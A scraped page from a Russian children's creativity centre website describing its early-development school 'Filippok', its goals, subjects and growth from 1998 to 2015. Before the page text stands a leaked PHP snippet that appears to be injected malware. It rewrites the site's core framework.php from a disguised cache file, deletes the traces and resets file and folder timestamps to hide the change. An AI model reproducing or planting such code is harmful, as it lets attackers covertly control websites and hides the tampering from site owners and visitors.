$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } О нас
МАУДО "Дом детского творчества п. Новосергиевка" Новосергиевского района Оренбургской области

Регистрация Вход

Зарегистрируйтесь, чтобы оставлять комментарии в гостевой книге



Спасибо за регистрацию

Ссылки

План мероприятий

Февраль 2018
Пн Вт Ср Чт Пт Сб Вс
29 30 31 1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 1 2 3 4
Developed by JoomVision.com
Баннер
  • Toggle
  • Закрыть

О нас PDF Печать E-mail
Автор: Administrator   
16.10.2014 14:30

   За последнее время система дополнительного образования значительно изменилась и приобрела ряд качественных характеристик, придающих этому виду образования уникальность и особую социальную значимость. Сегодня система ДО работает в режиме инноваций. Расширяются ее направления, основной становится образовательная деятельность. Организация в учреждениях дополнительного образования “дошкольного звена” - неотъемлемый компонент выполнения социального заказа населения, а также результат поэтапного решения федеральных и региональных задач в области образования.

    В Концепции модернизации системы образования одной из приоритетных задач является обеспечение государственных гарантий доступности и равных возможностей получения дошкольного образования для всех слоев населения.

   Широко известно, что к первоклассникам предъявляются сейчас очень высокие и разнообразные требования. И речь идёт не только о том, чтобы научить ребёнка читать, писать и считать.

   Сегодня много детей с ослабленным здоровьем, с хроническими заболеваниями; есть малообеспеченные семьи, которым нечем платить за дошкольное образование. И есть педагогически запущенные дети, родителям которых не до них и не до детского сада. Каждый родитель вправе выбирать, где его ребёнок будет получать дошкольное образование: в детском саду, у частного воспитателя или дома. Дети, не посещающие дошкольные учреждения, не имеют опыта адаптации , не умеют включаться в групповую работу, круг контактов в социальной сфере у них ограничен. Поэтому для детей данной категории существует потребность в компенсации личностного развития и выравнивания стартовых возможностей для поступления в школу.

Эту проблему можно решить в Школе раннего развития «Филиппок» на базе учреждения дополнительного образования.

В 2001 году была разработана комплексная программа для неорганизованных дошкольников,

    Школа раннего развития позволяет решить проблему подготовки детей старшего дошкольного возраста к школе, к обучению по программам дополнительного образования, а также решить ряд социально-педагогических задач:

  • Творческое развитие
  • Раннее развитие детей младшего дошкольного возраста
  • Социальная адаптация
  • Самоопределение детей в дополнительном образовании: посещение творческих объединений МОАУ ДОД ДДТ.

Многолетний  опыт работы школы раннего развития подтверждает необходимость комплексного подхода к всестороннему развитию ребенка.


Сегодня программа ШРР предусматривает развитие и обучение детей от 5 до 7 лет

     Главной целью программы является всестороннее развитие ребенка – развитие его мотивационной сферы, интеллектуальных и творческих сил. Нередко занятия с дошкольниками сводятся к обучению их счету, чтению, письму. Между тем педагогические исследования, многолетний опыт педагогов-практиков показывают, что для эффективного обучения детей важно сформировать у них познавательный интерес, желание и привычку думать, стремление узнать что-то новое. Важно научить их общаться со сверстниками и взрослыми, включаться в совместную игровую и общественно-полезную деятельность. Эти задачи решаются в процессе ознакомления детей с различными областями математической действительности, обучения чтению и освоения грамоты, развития речи, ознакомления с окружающим миром, выполнения творческих заданий. Новое не дается детям в готовом виде, а постигается ими путем самостоятельного анализа, сравнения, выявления существенных признаков.

    Большое внимание в ШРР уделяется эмоционально-личностному общению детей. Для воспитанников каждый год проводятся праздники  традиционные, день посвящения в «филиппки»  и выпускной. Кроме этого, в течение года организуются развлечения, игровые и тематические программы, экскурсии.

    Педагоги предоставляют возможность учиться не только детям, но и родителям, делая процесс общения взрослых и детей более гармоничным. Мы стараемся оказать помощь семье в интеллектуальном, психоэмоциональном и физическом развитии ребенка дошкольного возраста.

 

ЛЕТОПИСЬ


1998 год - открытие школы раннего развития «Филиппок»,

Создана 1 возрастная группа (15 человек); 4 учебных дисциплины: Развитие речи , Математическое развитие, развитие детского изобразительного творчества, Английский язык,

2000г – созданы 2 возрастные группы (30 человек); 5 учебных дисциплин:

  Развитие речи и подготовка к обучению грамоте, Математическое развитие, Развитие детского изобразительного творчества,  Музыкальное развитие дошкольника, Английский язык.

2009г созданы 6 возрастных групп (50 человек);7 учебных дисциплин:

Развитие речи и основы обучения грамоте, Математическое развитие, Развитие детского изобразительного творчества, Физическая культура, Музыкальное развитие дошкольника, Ознакомление с окружающим миром, Психологический тренинг:

2010г созданы 7 возрастных групп (60 человек); 7 учебных дисциплин:

Развитие речи и основы обучения грамоте, Математическое развитие, Развитие детского изобразительного творчества, Физическая культура, Музыкальное развитие дошкольника, Ознакомление с окружающим миром, Психологический тренинг:

2012 г. созданы 8 возрастных групп (74 человека); 7 учебных дисциплин :

  Развитие речи и основы обучения грамоте, Математическое развитие, Развитие детского изобразительного творчества, Физическая культура, Музыкальное развитие дошкольника, Ознакомление с окружающим миром, Я познаю себя,  

2014г. созданы 9 возрастных групп (104 человека); 7 учебных дисциплин:

  Развитие речи и основы обучения грамоте, Математическое развитие, Развитие детского изобразительного творчества, Физическая культура, Музыкальное развитие дошкольника, Ознакомление с окружающим миром, Я познаю себя.

2015г. созданы 9 возрастных групп (124 человека); 7 учебных дисциплин:

  Развитие речи и основы обучения грамоте, Математическое развитие, Развитие детского изобразительного творчества, Физическая культура, Музыкальное развитие дошкольника, Ознакомление с окружающим миром, Я познаю себя.

 

Назад

Обновлено 29.03.2016 16:36